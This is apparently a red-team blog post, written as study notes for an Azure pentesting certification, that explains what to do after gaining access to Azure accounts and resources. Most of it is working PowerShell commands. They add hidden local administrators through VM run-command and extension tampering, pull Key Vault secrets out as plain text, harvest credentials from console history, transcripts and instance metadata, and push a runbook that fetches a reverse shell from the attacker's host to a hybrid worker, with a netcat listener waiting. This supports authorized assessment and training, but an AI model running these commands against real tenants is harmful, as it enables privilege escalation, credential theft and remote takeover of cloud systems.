[Azure] What To Do If?

"What To Do If" is a blog that will be updated continuously to contain valuable information about Azure Cloud resources exploit.

Last update: July 23, 2024

Hi there! In this blog, from its title, we will answer the question "What to do if you found resource XYZ in Azure?" It's very simple and will be updated continuously to contain the latest updates, commands, tools, and more. I used this guide to pass CARTP (Certified Azure Red Team Professional) certificate from Altered Security, so thanks to them especially Nikhil for the great content.

For example, If you have an assessment in an Azure environment and you gained access to a specific account or application-managed identity, what's the first step you will take? what are you gonna do if you find yourself having a specific role assignment to a virtual machine or key vault? Exactly that's what we gonna discuss here, so let's get started...

All the following steps we will follow are circular, not sequential, which means if you logged in and followed the 2 steps then you found leaked credentials and logged in again with the new user, you may need to follow the same steps from the beginning again depends on the resources you have.

Content

  1. Used Tools

  2. Azure AD user account & Managed Identity.

  3. Virtual Machine & Extensions

  4. KeyVaults

  5. Storage Blob & Storage Accounts

  6. Automation Account

Used Tools

The most used tool we will depend on is Az Powershell, but we will use different tools for specific tasks, and we will add them here to collect them in one section

Az Powershell 

Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force

Az CLi

Download and install it from here

Azure AD user account & Managed Identity

This is your first step in any assessment to have an account or managed identity with specific roles because Azure pentest is unlike any normal website pentest, it seems like configuration review more than doing red team on on-prem environments. So, once you get an account, please do the following steps to know your roles and the resources you have access to.

  1. Login using Az Powershell $passwd = ConvertTo-SecureString "pass@1234" -AsPlainText -Force;$creds = New-Object System.Management.Automation.PSCredential ("test@aykalam.onmicrosoft.com", $passwd);Connect-AzAccount -Credential $creds

  2. Check the Get-AzResource` to know the resources you have access to.

  3. Check the Get-AzRoleAssignment to know the roles you have in a specific resource

  4. Check the owned objects by the user using the Az Module az ad signed-in-user list-owned-objects

  5. Check if we have Storage accounts / Blob using MicroBrust Scripts

  6. Try to login to the Azure portal and check the Deployment history

  7. Try to login to the Azure portal and if you have a Dynamic Group try to invite other users.

  8. If you aren't able to login to the Azure portal due to access policy, check the following solutions:

    + Try to login using the Az CLI, Az PowerShell, or AzureAD tools.

    + Try to change the user-agent in the browser to any other device "Maybe allowed access only for specific devices".

Virtual Machine & Extensions

Check the VM network profile and IP

  1. Run Get-AzResource

  2. Run Get-AzRoleAssignment because you have to gain read access at least for the VM and the network profile

  3. Check the roles you have in this VM from the above API call to get the permissions

  4. Get the network profile name Get-AzVM -Name VMName -ResourceGroupName RGName | select -ExpandProperty NetworkProfile

  5. Get the interface name Get-AzNetworkInterface -Name InterfaceName

  6. Get the public IP Get-AzPublicIpAddress -Name IPAddressName

If you have a Command Executer role.

Run directly ready scripts to add a user

Invoke-AzVMRunCommand -VMName VMName -ResourceGroupName RGName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\path\to\your\script' -Verbose

# content of the script file
$passwd = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
New-LocalUser -Name username -Password $passwd 
Add-LocalGroupMember -Group Administrators -Member username

Connect using the created account

$password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('username', $Password)
$sess = New-PSSession -ComputerName 10.20.30.40 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess

# After connecting, get the hostname and username of the machine
hostname
Get-LocalUser

# Incase you found a credentials, you can use the following command to authenticate
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('emailuser@ayhags.onmicrosoft.com', $password)
Connect-AzAccount -Credential $creds

Extract credentials from console history (after gaining a shell)

cat C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Check if there's any User Data stored in the machine (after gaining a shell)

$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))

Try the PowerShell transcripts (after gaining a shell)

cat C:\Transcripts\<id>\PowerShell_transcript.DESKTOP- M7C1AFM.6sZJrDuN.<id>.txt

Dealing with Extensions if you have read or write permission

# Check if the extensions are installed
Get-AzVMExtension -ResourceGroupName "RGName" -VMName "VMName"

# We will be unable to create new extension but can modify the "commandToExecute" to add your own local user
Set-AzVMExtension -ResourceGroupName "RGName" -ExtensionName "ExecCmd" -VMName "VMName" -Location "Location" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users <your-username> <password> /add /Y; net localgroup administrators <your-username> /add"}'

If you found yourself in the AzureAD Connect machine with On-Prem, try to reset the Sync_ account

# Check if you are in the AzureAD connect machine, the used module will be installed by default for any connect machine
Get-ADSyncConnector

KeyVault

At first, we will check if we have access to key vaults or not, and if we have, then we will try to get its secret and read it as plain text. It's very simple. 

Get-AzKeyVault
Vault Name: ResearchKeyVault

Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Name: researchkeyvault

Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader –AsPlainText
username: accountName@ayhags.onmicrosoft.com ; password:adfa@asdfa$#*!@#

Storage Blob / Accounts

Enumerate the storage blob using MicroBrust

. C:\AzAD\Tools\MicroBurst\Misc\Invoke-EnumerateAzureBlobs.ps1
Invoke-EnumerateAzureBlobs -Base <tenantName>

If you found a container, try to access it using the <Name> </Name> tag parameter after the URL endpoint.

Check Containers

If you find your user has access to the storage account. Check if there is a container that the user has access to

PS C:\AzAD\Tools> Get-AzResource
Name: RName
ResourceGroupName: RGName
ResourceType: Microsoft.Storage/storageAccounts

PS C:\AzAD\Tools> Get-AzStorageContainer -Context (New-AzStorageContext -StorageAccountName <SAName>)
# After that if you foudn a container, login using the account you have to the Storage Explorer via the Subscription tab

If you found SAS URL or Account creds have access to Storage Blob, Open the Storage Explorer application and authenticate using the SAS URL or the Account

Automation Account

Check your permissions over the automation account

Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<RGName>/providers/Microsoft.Automation/automationAccounts/HybridAutomation

Check if the hybrid worker is in use in the automation account

PS C:\AzAD\Tools> Get-AzAutomationHybridWorkerGroup -AutomationAccountName -ResourceGroupName
ResourceGroupName : AyKalam AutomationAccountName : HybridAutomation Name : Workergroup1
RunbookWorker : {} GroupType : User

Gain reverse shell access

Import PowerShell runbook file to download a reverse shell from your host machine and run it on the hybrid worker.

# Import the runbook file 
# filename.ps1 is any powershell reverse shell command. 
Import-AzAutomationRunbook -Name <RBName> -Path C:\Tools\filename.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Type PowerShell -Force -Verbose

# publish the runbook 
Publish-AzAutomationRunbook -RunbookName <RBName> -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose

# run your netcat listner
nc.exe -lvp 4444

# Start the runbook 
Start-AzAutomationRunbook -RunbookName <RBName> -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose

To be continued...

Thanks for reading <3 Stay in touch

LinkedIn | GitHub

Previous[Azure] Real Example to know different types of app concepts in Azure

Last updated